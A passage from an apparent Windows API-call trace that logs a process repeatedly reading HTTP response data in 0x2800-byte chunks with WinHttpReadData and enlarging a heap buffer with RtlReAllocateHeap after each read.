Ptr=0x5e50040, Size=0x278800) returned 0x9c80040 [0132.558] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9ef6040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ef6040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.559] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x27b000) returned 0x5e50040 [0132.664] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60c8840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60c8840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.664] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x27d800) returned 0x9c80040 [0132.710] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9efb040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9efb040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.711] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x280000) returned 0x5e50040 [0132.758] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60cd840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60cd840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.759] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x282800) returned 0x9c80040 [0132.858] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f00040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f00040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.859] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x285000) returned 0x5e50040 [0132.902] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60d2840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60d2840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.903] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x287800) returned 0x9c80040 [0132.946] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f05040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f05040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.946] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x28a000) returned 0x5e50040 [0132.990] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60d7840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60d7840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0132.991] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x28c800) returned 0x9c80040 [0133.034] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f0a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f0a040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0133.035] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x28f000) returned 0x5e50040 [0133.103] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60dc840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60dc840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0133.105] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x291800) returned 0x9c80040 [0133.165] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f0f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f0f040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0133.202] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x294000) returned 0x5e50040 [0133.344] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60e1840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60e1840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0133.726] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x296800) returned 0x9c80040 [0133.865] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f14040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f14040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0133.907] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x299000) returned 0x5e50040 [0134.445] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60e6840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60e6840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0134.471] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x29b800) returned 0x9c80040 [0134.532] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f19040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f19040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0134.535] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x29e000) returned 0x5e50040 [0134.676] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60eb840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60eb840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0134.678] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2a0800) returned 0x9c80040 [0134.728] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f1e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f1e040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0134.748] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2a3000) returned 0x5e50040 [0134.938] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60f0840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60f0840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0134.940] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2a5800) returned 0x9c80040 [0135.052] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f23040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f23040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0135.090] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2a8000) returned 0x5e50040 [0135.191] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60f5840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60f5840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0135.192] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2aa800) returned 0x9c80040 [0135.275] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f28040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f28040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0135.306] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2ad000) returned 0x5e50040 [0135.942] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60fa840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60fa840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0135.977] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2af800) returned 0x9c80040 [0136.036] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f2d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f2d040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0136.037] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2b2000) returned 0x5e50040 [0136.099] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x60ff840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x60ff840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0136.132] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2b4800) returned 0x9c80040 [0136.227] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f32040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f32040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0136.227] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2b7000) returned 0x5e50040 [0136.284] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6104840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6104840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0136.286] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2b9800) returned 0x9c80040 [0136.396] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f37040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f37040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0136.430] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2bc000) returned 0x5e50040 [0136.493] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6109840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6109840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0136.494] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2be800) returned 0x9c80040 [0136.652] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f3c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f3c040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0136.652] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2c1000) returned 0x5e50040 [0136.716] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x610e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x610e840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0136.717] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2c3800) returned 0x9c80040 [0136.826] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f41040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f41040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0136.847] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2c6000) returned 0x5e50040 [0136.909] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6113840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6113840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0136.911] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2c8800) returned 0x9c80040 [0137.021] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f46040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f46040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0137.043] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2cb000) returned 0x5e50040 [0137.110] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6118840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6118840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0137.111] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2cd800) returned 0x9c80040 [0137.171] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f4b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f4b040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0137.215] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2d0000) returned 0x5e50040 [0137.281] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x611d840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x611d840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0137.281] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2d2800) returned 0x9c80040 [0137.334] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f50040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f50040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0137.334] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2d5000) returned 0x5e50040 [0137.385] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6122840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6122840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0137.432] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2d7800) returned 0x9c80040 [0137.529] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f55040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f55040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0137.529] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2da000) returned 0x5e50040 [0137.636] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6127840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6127840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0137.660] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2dc800) returned 0x9c80040 [0137.713] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f5a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f5a040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0137.713] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2df000) returned 0x5e50040 [0137.763] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x612c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x612c840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0137.764] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2e1800) returned 0x9c80040 [0137.814] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f5f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f5f040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0137.814] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2e4000) returned 0x5e50040 [0137.864] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6131840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6131840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0137.865] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2e6800) returned 0x9c80040 [0137.915] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f64040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f64040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0137.915] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2e9000) returned 0x5e50040 [0137.974] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6136840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6136840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0137.975] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2eb800) returned 0x9c80040 [0138.076] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f69040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f69040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0138.099] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2ee000) returned 0x5e50040 [0138.153] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x613b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x613b840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0138.153] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2f0800) returned 0x9c80040 [0138.206] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f6e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f6e040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0138.243] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2f3000) returned 0x5e50040 [0138.320] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6140840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6140840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0138.321] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2f5800) returned 0x9c80040 [0138.376] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f73040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f73040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0138.376] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2f8000) returned 0x5e50040 [0138.431] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6145840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6145840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0138.477] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2fa800) returned 0x9c80040 [0138.545] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f78040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f78040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0138.546] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2fd000) returned 0x5e50040 [0138.600] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x614a840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x614a840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0138.601] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x2ff800) returned 0x9c80040 [0138.658] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f7d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f7d040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0138.697] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x302000) returned 0x5e50040 [0138.780] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x614f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x614f840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0138.781] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x304800) returned 0x9c80040 [0138.835] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f82040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f82040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0138.836] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x307000) returned 0x5e50040 [0138.930] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6154840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6154840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0138.947] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x309800) returned 0x9c80040 [0139.004] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f87040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f87040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0139.004] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x30c000) returned 0x5e50040 [0139.061] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6159840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6159840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0139.104] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x30e800) returned 0x9c80040 [0139.176] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f8c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f8c040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0139.176] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x311000) returned 0x5e50040 [0139.231] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x615e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x615e840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0139.232] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x313800) returned 0x9c80040 [0139.320] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f91040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f91040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0139.344] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x316000) returned 0x5e50040 [0139.401] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6163840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6163840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0139.401] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x318800) returned 0x9c80040 [0139.507] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f96040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f96040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0139.520] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x31b000) returned 0x5e50040 [0139.597] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6168840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6168840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0139.598] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x31d800) returned 0x9c80040 [0139.738] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9f9b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f9b040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0139.765] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x320000) returned 0x5e50040 [0139.865] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x616d840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x616d840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0139.937] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x322800) returned 0x9c80040 [0140.008] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9fa0040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fa0040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0140.009] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x325000) returned 0x5e50040 [0140.133] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6172840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6172840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0140.133] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x327800) returned 0x9c80040 [0140.222] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9fa5040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fa5040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0140.222] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x32a000) returned 0x5e50040 [0140.276] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x6177840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6177840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0140.278] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x32c800) returned 0x9c80040 [0140.331] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9faa040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9faa040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0140.332] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x32f000) returned 0x5e50040 [0140.403] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x617c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x617c840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0140.405] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x5e50040, Size=0x331800) returned 0x9c80040 [0140.516] WinHttpReadData (in: 